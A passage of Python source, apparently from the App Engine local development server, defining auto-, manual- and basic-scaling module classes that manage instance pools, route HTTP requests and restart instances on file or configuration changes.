with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that effects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(AutoScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override)
self._process_automatic_scaling(
self._module_configuration.automatic_scaling)
self._instances = set() # Protected by self._condition.
# A deque containg (time, num_outstanding_instance_requests) 2-tuples.
# This is used to track the maximum number of outstanding requests in a time
# period. Protected by self._condition.
self._outstanding_request_history = collections.deque()
self._num_outstanding_instance_requests = 0 # Protected by self._condition.
# The time when the last instance was quit in seconds since the epoch.
self._last_instance_quit_time = 0 # Protected by self._condition.
self._condition = threading.Condition() # Protects instance state.
self._instance_adjustment_thread = threading.Thread(
target=self._loop_adjusting_instances)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._instance_adjustment_thread.start()
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._instance_adjustment_thread.join()
# The instance adjustment thread depends on the balanced module and the
# watcher so wait for it exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
with self._condition:
instances = self._instances
self._instances = set()
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
@property
def num_outstanding_instance_requests(self):
"""The number of requests that instances are currently handling."""
with self._condition:
return self._num_outstanding_instance_requests
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if request_type != instance.READY_REQUEST:
with self._condition:
self._num_outstanding_instance_requests += 1
self._outstanding_request_history.append(
(time.time(), self.num_outstanding_instance_requests))
try:
logging.debug('Dispatching request to %s', inst)
return inst.handle(environ, start_response, url_map, match, request_id,
request_type)
finally:
with self._condition:
if request_type != instance.READY_REQUEST:
self._num_outstanding_instance_requests -= 1
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
with self._condition:
self._num_outstanding_instance_requests += 1
self._outstanding_request_history.append(
(time.time(), self.num_outstanding_instance_requests))
try:
start_time = time.time()
timeout_time = start_time + self._min_pending_latency
# Loop until an instance is available to handle the request.
while True:
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if not inst:
inst = self._add_instance(permit_warmup=False)
if not inst:
# No instance is available nor can a new one be created, so loop
# waiting for one to be free.
timeout_time = time.time() + 0.2
continue
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ,
start_response,
url_map,
match,
request_id,
request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._num_outstanding_instance_requests -= 1
self._condition.notify()
def _add_instance(self, permit_warmup):
"""Creates and adds a new instance.Instance to the Module.
Args:
permit_warmup: If True then the new instance.Instance will be sent a new
warmup request if it is configured to receive them.
Returns:
The newly created instance.Instance. Returns None if no new instance
could be created because the maximum number of instances have already
been created.
"""
if self._max_instances is not None:
with self._condition:
if len(self._instances) >= self._max_instances:
return None
perform_warmup = permit_warmup and (
'warmup' in (self._module_configuration.inbound_services or []))
inst = self._instance_factory.new_instance(
self.generate_instance_id(),
expect_ready_request=perform_warmup)
with self._condition:
if self._quit_event.is_set():
return None
self._instances.add(inst)
if not inst.start():
return None
if perform_warmup:
self._async_warmup(inst)
else:
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
logging.debug('Created instance: %s', inst)
return inst
@staticmethod
def generate_instance_id():
return ''.join(random.choice(_LOWER_HEX_DIGITS) for _ in range(36))
def _warmup(self, inst):
"""Send a warmup request to the given instance."""
try:
environ = self.build_request_environ(
'GET', '/_ah/warmup', [], '', '0.1.0.3', self.balanced_port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling warmup request.')
def _async_warmup(self, inst):
"""Asynchronously send a markup request to the given Instance."""
_THREAD_POOL.submit(self._warmup, inst)
def _trim_outstanding_request_history(self):
"""Removes obsolete entries from _outstanding_request_history."""
window_start = time.time() - self._REQUIRED_INSTANCE_WINDOW_SECONDS
with self._condition:
while self._outstanding_request_history:
t, _ = self._outstanding_request_history[0]
if t < window_start:
self._outstanding_request_history.popleft()
else:
break
def _get_num_required_instances(self):
"""Returns the number of Instances required to handle the request load."""
with self._condition:
self._trim_outstanding_request_history()
if not self._outstanding_request_history:
return 0
else:
peak_concurrent_requests = max(
current_requests
for (t, current_requests)
in self._outstanding_request_history)
return int(math.ceil(peak_concurrent_requests /
self.max_instance_concurrent_requests))
def _split_instances(self):
"""Returns a 2-tuple representing the required and extra Instances.
Returns:
A 2-tuple of (required_instances, not_required_instances):
required_instances: The set of the instance.Instances, in a state that
can handle requests, required to handle the current
request load.
not_required_instances: The set of the Instances contained in this
Module that not are not required.
"""
with self._condition:
num_required_instances = self._get_num_required_instances()
available = [inst for inst in self._instances
if inst.can_accept_requests]
available.sort(key=lambda inst: -inst.num_outstanding_requests)
required = set(available[:num_required_instances])
return required, self._instances - required
def _choose_instance(self, timeout_time):
"""Returns the best Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time:
required_instances, not_required_instances = self._split_instances()
if required_instances:
# Pick the instance with the most remaining capacity to handle
# requests.
required_instances = sorted(
required_instances,
key=lambda inst: inst.remaining_request_capacity)
if required_instances[-1].remaining_request_capacity:
return required_instances[-1]
available_instances = [inst for inst in not_required_instances
if inst.remaining_request_capacity > 0 and
inst.can_accept_requests]
if available_instances:
# Pick the instance with the *least* capacity to handle requests
# to avoid using unnecessary idle instances.
available_instances.sort(
key=lambda instance: instance.num_outstanding_requests)
return available_instances[-1]
else:
self._condition.wait(timeout_time - time.time())
return None
def _adjust_instances(self):
"""Creates new Instances or deletes idle Instances based on current load."""
now = time.time()
with self._condition:
_, not_required_instances = self._split_instances()
if len(not_required_instances) < self._min_idle_instances:
self._add_instance(permit_warmup=True)
elif (len(not_required_instances) > self._max_idle_instances and
now >
(self._last_instance_quit_time + self._MIN_SECONDS_BETWEEN_QUITS)):
for inst in not_required_instances:
if not inst.num_outstanding_requests:
try:
inst.quit()
except instance.CannotQuitServingInstance:
pass
else:
self._last_instance_quit_time = now
logging.debug('Quit instance: %s', inst)
with self._condition:
self._instances.discard(inst)
break
def _loop_adjusting_instances(self):
"""Loops until the Module exits, reloading, adding or removing Instances."""
while not self._quit_event.is_set():
if self.ready:
if self._automatic_restarts:
self._handle_changes()
self._adjust_instances()
self._quit_event.wait(timeout=1)
def __call__(self, environ, start_response):
return self._handle_request(environ, start_response)
class ManualScalingModule(Module):
"""A pool of instances that is manually-scaled."""
_DEFAULT_MANUAL_SCALING = appinfo.ManualScaling(instances='1')
_MAX_REQUEST_WAIT_TIME = 10
@classmethod
def _populate_default_manual_scaling(cls, manual_scaling):
for attribute in manual_scaling.ATTRIBUTES:
if getattr(manual_scaling, attribute) in ('manual', None):
setattr(manual_scaling, attribute,
getattr(cls._DEFAULT_MANUAL_SCALING, attribute))
def _process_manual_scaling(self, manual_scaling):
if manual_scaling:
self._populate_default_manual_scaling(manual_scaling)
else:
manual_scaling = self._DEFAULT_MANUAL_SCALING
self._initial_num_instances = int(manual_scaling.instances)
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for ManualScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_host: The host that APIServer listens for RPC requests on.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instances containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that effects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(ManualScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override)
self._process_manual_scaling(module_configuration.manual_scaling)
self._instances = [] # Protected by self._condition.
self._wsgi_servers = [] # Protected by self._condition.
# Whether the module has been stopped. Protected by self._condition.
self._suspended = False
self._condition = threading.Condition() # Protects instance state.
# Serializes operations that modify the serving state of or number of
# instances.
self._instances_change_lock = threading.RLock()
self._change_watcher_thread = threading.Thread(
target=self._loop_watching_for_changes)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._change_watcher_thread.start()
with self._instances_change_lock:
if self._max_instances is not None:
initial_num_instances = min(self._max_instances,
self._initial_num_instances)
else:
initial_num_instances = self._initial_num_instances
for _ in xrange(initial_num_instances):
self._add_instance()
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._change_watcher_thread.join()
# The instance adjustment thread depends on the balanced module and the
# watcher so wait for it exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
for wsgi_servr in self._wsgi_servers:
wsgi_servr.quit()
with self._condition:
instances = self._instances
self._instances = []
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
try:
instance_id = int(instance_id)
except ValueError:
raise request_info.InvalidInstanceIdError()
with self._condition:
if 0 <= instance_id < len(self._instances):
wsgi_servr = self._wsgi_servers[instance_id]
else:
raise request_info.InvalidInstanceIdError()
return wsgi_servr.port
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
try:
while time.time() < timeout_time:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
pass
inst.wait(timeout_time)
if inst.has_quit:
return self._error_response(environ, start_response, 503)
else:
return self._error_response(environ, start_response, 503)
finally:
with self._condition:
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if ((request_type in (instance.NORMAL_REQUEST, instance.READY_REQUEST) and
self._suspended) or self._quit_event.is_set()):
return self._error_response(environ, start_response, 404)
if self._module_configuration.is_backend:
environ['BACKEND_ID'] = self._module_configuration.module_name
else:
environ['BACKEND_ID'] = appinfo.MODULE_SEPARATOR.join([
self._module_configuration.module_name,
self._module_configuration.version_id.split('.', 1)[0]])
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
while time.time() < timeout_time:
if ((request_type in (instance.NORMAL_REQUEST, instance.READY_REQUEST) and
self._suspended) or self._quit_event.is_set()):
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if inst:
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._condition.notify()
else:
return self._error_response(environ, start_response, 503)
def _add_instance(self):
"""Creates and adds a new instance.Instance to the Module.
This must be called with _instances_change_lock held.
"""
instance_id = self.get_num_instances()
assert self._max_instances is None or instance_id < self._max_instances
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr = wsgi_server.WsgiServer(
(self._host, 0), functools.partial(self._handle_request, inst=inst))
wsgi_servr.start()
self._port_registry.add(wsgi_servr.port, self, inst)
with self._condition:
if self._quit_event.is_set():
return
self._wsgi_servers.append(wsgi_servr)
self._instances.append(inst)
suspended = self._suspended
if not suspended:
self._async_start_instance(wsgi_servr, inst)
def _async_start_instance(self, wsgi_servr, inst):
_THREAD_POOL.submit(self._start_instance, wsgi_servr, inst)
def _start_instance(self, wsgi_servr, inst):
if inst.start():
logging.debug('Started instance: %s at http://%s:%s', inst, self.host,
wsgi_servr.port)
try:
environ = self.build_request_environ(
'GET', '/_ah/start', [], '', '0.1.0.3', wsgi_servr.port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
logging.debug('Sent start request: %s', inst)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling start request.')
def _choose_instance(self, timeout_time):
"""Returns an Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time:
for inst in self._instances:
if inst.can_accept_requests:
return inst
self._condition.wait(timeout_time - time.time())
return None
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
has_file_changes = self._watcher.has_changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if has_file_changes:
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES or has_file_changes:
with self._instances_change_lock:
if not self._suspended:
self.restart()
def _loop_watching_for_changes(self):
"""Loops until the InstancePool is done watching for file changes."""
while not self._quit_event.is_set():
if self.ready:
if self._automatic_restarts:
self._handle_changes()
self._quit_event.wait(timeout=1)
def get_num_instances(self):
with self._instances_change_lock:
with self._condition:
return len(self._instances)
def set_num_instances(self, instances):
if self._max_instances is not None:
instances = min(instances, self._max_instances)
with self._instances_change_lock:
with self._condition:
running_instances = self.get_num_instances()
if running_instances > instances:
wsgi_servers_to_quit = self._wsgi_servers[instances:]
del self._wsgi_servers[instances:]
instances_to_quit = self._instances[instances:]
del self._instances[instances:]
if running_instances < instances:
for _ in xrange(instances - running_instances):
self._add_instance()
if running_instances > instances:
for inst, wsgi_servr in zip(instances_to_quit, wsgi_servers_to_quit):
self._async_quit_instance(inst, wsgi_servr)
def _async_quit_instance(self, inst, wsgi_servr):
_THREAD_POOL.submit(self._quit_instance, inst, wsgi_servr)
def _quit_instance(self, inst, wsgi_servr):
port = wsgi_servr.port
wsgi_servr.quit()
inst.quit(expect_shutdown=True)
self._shutdown_instance(inst, port)
def suspend(self):
"""Suspends serving for this module, quitting all running instances."""
with self._instances_change_lock:
if self._suspended:
raise request_info.ModuleAlreadyStoppedError()
self._suspended = True
with self._condition:
instances_to_stop = zip(self._instances, self._wsgi_servers)
for wsgi_servr in self._wsgi_servers:
wsgi_servr.set_error(404)
for inst, wsgi_servr in instances_to_stop:
self._async_suspend_instance(inst, wsgi_servr.port)
def _async_suspend_instance(self, inst, port):
_THREAD_POOL.submit(self._suspend_instance, inst, port)
def _suspend_instance(self, inst, port):
inst.quit(expect_shutdown=True)
self._shutdown_instance(inst, port)
def resume(self):
"""Resumes serving for this module."""
with self._instances_change_lock:
if not self._suspended:
raise request_info.ModuleAlreadyStartedError()
self._suspended = False
with self._condition:
if self._quit_event.is_set():
return
wsgi_servers = self._wsgi_servers
instances_to_start = []
for instance_id, wsgi_servr in enumerate(wsgi_servers):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr.set_app(functools.partial(self._handle_request, inst=inst))
self._port_registry.add(wsgi_servr.port, self, inst)
with self._condition:
if self._quit_event.is_set():
return
self._instances[instance_id] = inst
instances_to_start.append((wsgi_servr, inst))
for wsgi_servr, inst in instances_to_start:
self._async_start_instance(wsgi_servr, inst)
def restart(self):
"""Restarts the the module, replacing all running instances."""
with self._instances_change_lock:
with self._condition:
if self._quit_event.is_set():
return
instances_to_stop = self._instances[:]
wsgi_servers = self._wsgi_servers[:]
instances_to_start = []
for instance_id, wsgi_servr in enumerate(wsgi_servers):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr.set_app(functools.partial(self._handle_request, inst=inst))
self._port_registry.add(wsgi_servr.port, self, inst)
instances_to_start.append(inst)
with self._condition:
if self._quit_event.is_set():
return
self._instances[:] = instances_to_start
for inst, wsgi_servr in zip(instances_to_stop, wsgi_servers):
self._async_suspend_instance(inst, wsgi_servr.port)
for wsgi_servr, inst in zip(wsgi_servers, instances_to_start):
self._async_start_instance(wsgi_servr, inst)
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
try:
with self._condition:
return self._instances[int(instance_id)]
except (ValueError, IndexError):
raise request_info.InvalidInstanceIdError()
def __call__(self, environ, start_response, inst=None):
return self._handle_request(environ, start_response, inst)
@property
def supports_individually_addressable_instances(self):
return True
class BasicScalingModule(Module):
"""A pool of instances that is basic-scaled."""
_DEFAULT_BASIC_SCALING = appinfo.BasicScaling(max_instances='1',
idle_timeout='15m')
_MAX_REQUEST_WAIT_TIME = 10
@staticmethod
def _parse_idle_timeout(timing):
"""Parse a idle timeout string into an int of the value in seconds.
Args:
timing: A str of the form 1m or 10s.
Returns:
An int representation of the value in seconds.
"""
if timing.endswith('m'):
return int(timing[:-1]) * 60
else:
return int(timing[:-1])
@classmethod
def _populate_default_basic_scaling(cls, basic_scaling):
for attribute in basic_scaling.ATTRIBUTES:
if getattr(basic_scaling, attribute) in ('basic', None):
setattr(basic_scaling, attribute,
getattr(cls._DEFAULT_BASIC_SCALING, attribute))
def _process_basic_scaling(self, basic_scaling):
if basic_scaling:
self._populate_default_basic_scaling(basic_scaling)
else:
basic_scaling = self._DEFAULT_BASIC_SCALING
if self._max_instances is not None:
self._max_instances = min(self._max_instances,
int(basic_scaling.max_instances))
else:
self._max_instances = int(basic_scaling.max_instances)
self._instance_idle_timeout = self._parse_idle_timeout(
basic_scaling.idle_timeout)
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for BasicScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_host: The host that APIServer listens for RPC requests on.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instances containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that effects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(BasicScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override)
self._process_basic_scaling(module_configuration.basic_scaling)
self._instances = [] # Protected by self._condition.
self._wsgi_servers = [] # Protected by self._condition.
# A list of booleans signifying whether the corresponding instance in
# self._instances has been or is being started.
self._instance_running = [] # Protected by self._condition.
for instance_id in xrange(self._max_instances):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
self._instances.append(inst)
self._wsgi_servers.append(wsgi_server.WsgiServer(
(self._host, 0), functools.partial(self._handle_request, inst=inst)))
self._instance_running.append(False)
self._condition = threading.Condition() # Protects instance state.
self._change_watcher_thread = threading.Thread(
target=self._loop_watching_for_changes_and_idle_instances)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._change_watcher_thread.start()
for wsgi_servr, inst in zip(self._wsgi_servers, self._instances):
wsgi_servr.start()
self._port_registry.add(wsgi_servr.port, self, inst)
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._change_watcher_thread.join()
# The instance adjustment thread depends on the balanced module and the
# watcher so wait for it exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
for wsgi_servr in self._wsgi_servers:
wsgi_servr.quit()
with self._condition:
instances = self._instances
self._instances = []
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
try:
instance_id = int(instance_id)
except ValueError:
raise request_info.InvalidInstanceIdError()
with self._condition:
if 0 <= instance_id < len(self._instances):
wsgi_servr = self._wsgi_servers[instance_id]
else:
raise request_info.InvalidInstanceIdError()
return wsgi_servr.port
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
instance_id = inst.instance_id
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
try:
while time.time() < timeout_time:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
pass
if inst.has_quit:
return self._error_response(environ, start_response, 503)
with self._condition:
if self._instance_running[instance_id]:
should_start = False
else:
self._instance_running[instance_id] = True
should_start = True
if should_start:
self._start_instance(instance_id)
else:
inst.wait(timeout_time)
else:
return self._error_response(environ, start_response, 503)
finally:
with self._condition:
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
if self._module_configuration.is_backend:
environ['BACKEND_ID'] = self._module_configuration.module_name
else:
environ['BACKEND_ID'] = appinfo.MODULE_SEPARATOR.join([
self._module_configuration.module_name,
self._module_configuration.version_id.split('.', 1)[0]])
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
while time.time() < timeout_time:
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if inst:
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._condition.notify()
else:
return self._error_response(environ, start_response, 503)
def _start_any_instance(self):
"""Choose an inactive instance and start it asynchronously.
Returns:
An instance.Instance that will be started asynchronously or None if all
instances are already running.
"""
with self._condition:
for instance_id, running in enumerate(self._instance_running):
if not running:
self._instance_running[instance_id] = True
inst = self._instances[instance_id]
break
else:
return None
self._async_start_instance(instance_id)
return inst
def _async_start_instance(self, instance_id):
_THREAD_POOL.submit(self._start_instance, instance_id)
def _start_instance(self, instance_id):
with self._condition:
if self._quit_event.is_set():
return
wsgi_servr = self._wsgi_servers[instance_id]
inst = self._instances[instance_id]
if inst.start():
logging.debug('Started instance: %s at http://%s:%s', inst, self.host,
wsgi_servr.port)
try:
environ = self.build_request_environ(
'GET', '/_ah/start', [], '', '0.1.0.3', wsgi_servr.port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
logging.debug('Sent start request: %s', inst)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling start request.')
def _choose_instance(self, timeout_time):
"""Returns an Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time and not self._quit_event.is_set():
for inst in self._instances:
if inst.can_accept_requests:
return inst
else:
inst = self._start_any_instance()
if inst:
break
self._condition.wait(timeout_time - time.time())
else:
return None
if inst:
inst.wait(timeout_time)
return inst
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
has_file_changes = self._watcher.has_changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if has_file_changes:
self._instance_factory.files_changed()
